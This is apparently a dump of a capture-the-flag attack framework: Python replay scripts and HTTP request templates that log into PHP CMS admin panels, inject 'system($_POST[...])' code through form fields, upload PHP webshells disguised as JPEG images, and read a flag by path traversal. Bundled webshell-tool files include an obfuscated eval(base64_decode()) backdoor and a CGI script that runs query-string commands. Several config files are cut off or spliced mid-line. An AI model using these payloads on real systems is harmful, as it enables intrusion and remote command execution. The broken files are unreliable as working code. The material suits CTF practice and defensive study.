send_http(s,parse_http(request_1),target,target_port) 16 | # print reply_1[1] 17 | 18 | request_2 = open(file_dir + '2.txt').read() 19 | request_2 = request_2.replace('{{cookie}}','') 20 | request_2 = request_2.replace('{{token}}','') 21 | print 
parse_http(request_2) 22 | exit() 23 | reply_2 = send_http(s,parse_http(request_2),target,target_port) 24 | print reply_2[1] 25 | 26 | request_3 = open(file_dir + '3.txt').read() 27 | request_3 = request_3.replace('{{cookie}}','') 28 | reply_3 = send_http(s,parse_http(request_3),target,target_port) 29 | print reply_3[1] 30 | 31 | -------------------------------------------------------------------------------- /seq/change_passeword/1.txt: -------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=123456789&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/change_passeword/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=editpage HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 150 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=editpage 12 | Accept-Encoding: 
gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | title=aaaa&seo_name=baidu.com&content=6666&description=&keywords=&hidden=';{{shell}};//&sub_page={{hash}}&theme=default&save=Save 17 | -------------------------------------------------------------------------------- /seq/change_passeword/3.txt: -------------------------------------------------------------------------------- 1 | POST /data/settings/pages/{{hash}}1.baidu.com.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/change_passeword/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/change_passeword/__init__.py -------------------------------------------------------------------------------- /seq/change_passeword/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 17 | re_hash_3 = re_hash_2 18 | 19 | 20 | #re_hash_3 = random_string() 21 | #re_filename_4 = re_filename_3 22 | #re_hash_4 = re_hash_3 23 | -------------------------------------------------------------------------------- 
/seq/edit_page/1.txt: -------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=12345678&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/edit_page/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=editpage HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 150 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=editpage 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | title=aaaa&seo_name=baidu.com&content=6666&description=&keywords=&hidden=';{{shell}};//&sub_page={{hash}}&theme=default&save=Save 17 | -------------------------------------------------------------------------------- /seq/edit_page/3.txt: -------------------------------------------------------------------------------- 1 | POST 
/data/settings/pages/{{hash}}1.baidu.com.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/edit_page/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/edit_page/__init__.py -------------------------------------------------------------------------------- /seq/edit_page/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 17 | re_hash_3 = re_hash_2 18 | 19 | 20 | #re_hash_3 = random_string() 21 | #re_filename_4 = re_filename_3 22 | #re_hash_4 = re_hash_3 23 | -------------------------------------------------------------------------------- /seq/example/1.txt: -------------------------------------------------------------------------------- 1 | POST /index.php HTTP/1.1 2 | Host: mut-orff.org:12345 3 | Accept-Encoding: identity 4 | Content-Length: 153 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 7 | 8 | 
222=%24a%3D%27sy%27.%27stem%27%3B%24b%20%3D%20%27{{cmd}}%27%3B%24a%28base64_decode%28%24b%29%29%3B 9 | -------------------------------------------------------------------------------- /seq/example/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/example/__init__.py -------------------------------------------------------------------------------- /seq/example/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | 7 | def random_string(): 8 | return hashlib.md5(str(time.time())).hexdigest() 9 | 10 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 11 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | #re_filename_3 = random_string() + '.pht' 13 | #re_hash_3 = random_string() 14 | #re_filename_4 = re_filename_3 15 | #re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/gen_py.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import re 4 | 5 | my_dir = 'read_flag_qwb' 6 | count = 3 7 | 8 | file_dir = '' + my_dir + '/' 9 | 10 | res = '''#!/usr/bin/env python 11 | 12 | from new_replay import * 13 | import requests 14 | import hashlib 15 | import time 16 | 17 | #target = '47.105.121.116' 18 | #target_port = 80 19 | my_hash = hashlib.md5('xxxx' + str(target) + str(target_port) + str(time.time())).hexdigest() 20 | file_dir = '%s' 21 | s = requests.session() 22 | 23 | '''%file_dir 24 | 25 | 26 | for i in range(count): 27 | content = open(file_dir + '%d.txt' %(i+1)).read() 28 | rep_strs = re.findall('{{[\w]+}}',content) 29 | res += '''request_%d = open(file_dir + '%d.txt').read()\n'''%(i+1,i+1) 30 | for rep_str in rep_strs: 31 | res += 
'''request_%d = request_%d.replace('%s','')\n'''%(i+1,i+1,rep_str) 32 | 33 | res += '''reply_%d = send_http(s,parse_http(request_%d),target,target_port) 34 | print reply_%d[1]''' %(i+1,i+1,i+1) 35 | res += "\n\n" 36 | 37 | 38 | open('../attack.py','w').write(res) 39 | 40 | -------------------------------------------------------------------------------- /seq/image_upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=12345678&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/image_upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=images HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 294 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykn0cxRBYFpjA92DI 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=images 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: 
zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | ------WebKitFormBoundarykn0cxRBYFpjA92DI 17 | Content-Disposition: form-data; name="imagefile"; filename="{{hash}}.php" 18 | Content-Type: image/jpeg 19 | 20 | 21 | {{shell}} 22 | ------WebKitFormBoundarykn0cxRBYFpjA92DI 23 | Content-Disposition: form-data; name="submit" 24 | 25 | Upload 26 | ------WebKitFormBoundarykn0cxRBYFpjA92DI-- 27 | -------------------------------------------------------------------------------- /seq/image_upload/3.txt: -------------------------------------------------------------------------------- 1 | POST /images/{{hash}}.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/image_upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/image_upload/__init__.py -------------------------------------------------------------------------------- /seq/image_upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = 
random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = "',''],"re_pass_2":['','']} 11 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | #re_filename_3 = random_string() + '.pht' 13 | #re_hash_3 = random_string() 14 | #re_filename_4 = re_filename_3 15 | #re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/1.txt: -------------------------------------------------------------------------------- 1 | GET /web/login HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | 8 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/2.txt: -------------------------------------------------------------------------------- 1 | POST /web/login_check HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | Cookie: {{cookie}} 8 | Content-Type: application/x-www-form-urlencoded 9 | Content-Length: 121 10 | Content-Type: application/x-www-form-urlencoded 11 | A: B 12 | C: D 13 | 14 | _password=teacher&_username=teacher&_csrf_token={{token}}&_target_path=&_remember_me=on 15 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/3.txt: -------------------------------------------------------------------------------- 1 | GET /web/classroom/1/manage/student/export?role=student&fileName=/var/www/html/web/app/data/private_files/../../../../../../../../../../../../a/../flag HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | Cookie: 
REMEMBERME=Qml6XFVzZXJcQ3VycmVudFVzZXI6ZEdWaFkyaGxja0IwWldGamFHVnlMblJsWVdOb1pYST06MTU1NTIxNzYzMDo5MjhhYmE3NzA4MzkyOWI1NzZjYjZhNWM2NTA2MjQwMTZhM2RkOWMzNmM3ZWZjNDFhZDFiZTJjMGRhZjRhMTNm; PHPSESSID={{cookie}} 8 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/read_flag_qwb/__init__.py -------------------------------------------------------------------------------- /seq/read_flag_qwb/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | re_cookie_3 = re_cookie_2 14 | res_re_pattern_1 = { 15 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 16 | #re_filename_3 = random_string() + '.pht' 17 | re_hash_2 = random_string() 18 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 19 | re_hash_3 = re_hash_2 20 | 21 | 22 | #re_hash_3 = random_string() 23 | #re_filename_4 = re_filename_3 24 | #re_hash_4 = re_hash_3 25 | -------------------------------------------------------------------------------- /seq/shit_upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /user/upFiles/upload HTTP/1.1 2 | Host: 172.20.121.101 3 | Content-Length: 183 4 | Accept: application/json, text/javascript, */*; q=0.01 5 | Origin: http://172.20.121.101 6 | X-Requested-With: XMLHttpRequest 7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 8 | Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundarykTVbczAdhtOXMPcc 9 | Referer: http://172.20.121.101/index.php/user/Set/index 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,pl;q=0.6 12 | Cookie: PHPSESSID=6tbvpak6a0suhfru3pkc0fsgr4 13 | Connection: close 14 | 15 | ------WebKitFormBoundarykTVbczAdhtOXMPcc 16 | Content-Disposition: form-data; name="file"; filename="1.php" 17 | Content-Type: image/jpeg 18 | 19 | {{shell}} 20 | ------WebKitFormBoundarykTVbczAdhtOXMPcc-- 21 | -------------------------------------------------------------------------------- /seq/shit_upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /public{{filename}} HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 44 5 | 6 | {{hash}}={{cmd}} 7 | -------------------------------------------------------------------------------- /seq/shit_upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/shit_upload/__init__.py -------------------------------------------------------------------------------- /seq/shit_upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = base64.b64encode("'%re_hash_3) 13 | re_filename_2 = random_string() 14 | re_filename_3 = re_filename_2 15 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 16 | 
#res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 17 | #re_filename_3 = random_string() + '.pht' 18 | #re_hash_3 = random_string() 19 | #re_filename_4 = re_filename_3 20 | #re_hash_4 = re_hash_3 21 | -------------------------------------------------------------------------------- /seq/sql/test.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /seq/template_replay.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from new_replay import * 4 | import requests 5 | 6 | #target = '47.105.121.116' 7 | #target_port = 80 8 | file_dir = 'seq/shit_upload/' 9 | s = requests.session() 10 | 11 | 12 | request_1 = open(file_dir + '1.txt').read() 13 | request_1 = request_1.replace('{{}}','') 14 | request_1 = request_1.replace('{{}}','') 15 | reply_1 = send_http(s,parse_http(request_1),target,target_port) 16 | print reply_1[1] 17 | 18 | 19 | request_2 = open(file_dir + '2.txt').read() 20 | request_2 = request_1.replace('{{}}','') 21 | request_2 = request_1.replace('{{}}','') 22 | reply_2 = send_http(s,parse_http(request_2),target,target_port) 23 | print reply_2[1] 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /seq/test/1.txt: -------------------------------------------------------------------------------- 1 | GET /data/users/admin.xml HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Connection: keep-alive 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Upgrade-Insecure-Requests: 1 7 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 9 | Accept-Encoding: gzip, deflate 10 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 11 | 12 | 
-------------------------------------------------------------------------------- /seq/test/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin/index.php? HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Connection: keep-alive 4 | Content-Length: 39 5 | Pragma: no-cache 6 | Cache-Control: no-cache 7 | Origin: http://mut-orff.org:8080 8 | Upgrade-Insecure-Requests: 1 9 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 10 | Content-Type: application/x-www-form-urlencoded 11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 12 | Referer: http://mut-orff.org:8080/admin/ 13 | Accept-Encoding: gzip, deflate 14 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 15 | 16 | userid={{user}}&pwd={{pass}}&submitted=Login 17 | -------------------------------------------------------------------------------- /seq/test/3.txt: -------------------------------------------------------------------------------- 1 | POST /admin/my_upload.php HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Proxy-Connection: keep-alive 4 | Content-Length: 329 5 | Cache-Control: max-age=0 6 | Origin: http://mut-orff.org:8080 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycIvUVAnoWLssjgc9 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://mut-orff.org:8080/admin/my_upload.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | ------WebKitFormBoundarycIvUVAnoWLssjgc9 16 | Content-Disposition: form-data; name="upload"; filename="{{filename}}" 17 | Content-Type: application/octet-stream 18 | 19 | 20 | ------WebKitFormBoundarycIvUVAnoWLssjgc9 21 | Content-Disposition: 
form-data; name="MAX_FILE_SIZE" 22 | 23 | 1024 24 | ------WebKitFormBoundarycIvUVAnoWLssjgc9-- 25 | -------------------------------------------------------------------------------- /seq/test/4.txt: -------------------------------------------------------------------------------- 1 | GET /admin/upload/{{filename}}?{{hash}}={{cmd}} HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Proxy-Connection: keep-alive 4 | Cache-Control: max-age=0 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 8 | Accept-Encoding: gzip, deflate 9 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 10 | 11 | -------------------------------------------------------------------------------- /seq/test/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/test/__init__.py -------------------------------------------------------------------------------- /seq/test/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | 7 | def random_string(): 8 | return hashlib.md5(str(time.time())).hexdigest() 9 | 10 | res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 11 | res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | re_filename_3 = random_string() + '.pht' 13 | re_hash_3 = random_string() 14 | re_filename_4 = re_filename_3 15 | re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/test/test.txt: -------------------------------------------------------------------------------- 1 | dsdsdsfs 2 | 
-------------------------------------------------------------------------------- /seq/upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /index.php?m=Home&c=Uploadify&a=preview&num=1&input=head_pic&path=head_pic&func=add_img HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 47 5 | 6 | data:image/php;base64,{{shell}} 7 | -------------------------------------------------------------------------------- /seq/upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /preview/{{filename}}.php HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 44 5 | 6 | {{hash}}={{cmd}} 7 | -------------------------------------------------------------------------------- /seq/upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/upload/__init__.py -------------------------------------------------------------------------------- /seq/upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = base64.b64encode("3){ 4 | $k="${password[2:]}"; 5 | echo "<$k>"; 6 | eval(base64_decode(preg_replace(array("/[^\w=\s]/","/\s/"), array("","+"), join(array_slice($a,$c($a)-3))))); 7 | echo ""; 8 | } 9 | 
-------------------------------------------------------------------------------- /utils/weevely3/bd/obfuscators/cleartext1_php.tpl: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /utils/weevely3/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/legacycookie/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/legacycookie/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/legacyreferrer/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/legacyreferrer/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/stegaref/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/stegaref/__init__.py 
-------------------------------------------------------------------------------- /utils/weevely3/core/weexceptions.py: -------------------------------------------------------------------------------- 1 | """ Fatal errors """ 2 | class FatalException(Exception): 3 | pass 4 | 5 | """ Fatal errors on module development """ 6 | class DevException(Exception): 7 | pass 8 | 9 | """ Argument parsing tried to Exit """ 10 | class ArgparseError(Exception): 11 | pass 12 | 13 | """ Error on channel internals """ 14 | class ChannelException(Exception): 15 | # This should be intercepted not at send() 16 | # but at some level before (e.g. when) calling 17 | # setup to interrupt directly the cmd execution 18 | pass 19 | -------------------------------------------------------------------------------- /utils/weevely3/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/audit/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/_disablefunctionbypass/cgi.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo -ne "Content-Type: text/html\n\n" 3 | b=$(echo "$QUERY_STRING" | sed -n 's/^.*c=\([^&]*\).*$/\1/p' | sed "s/%20/ /g") 4 | eval $b -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/suidsgid.py: -------------------------------------------------------------------------------- 1 | from core.vectors import 
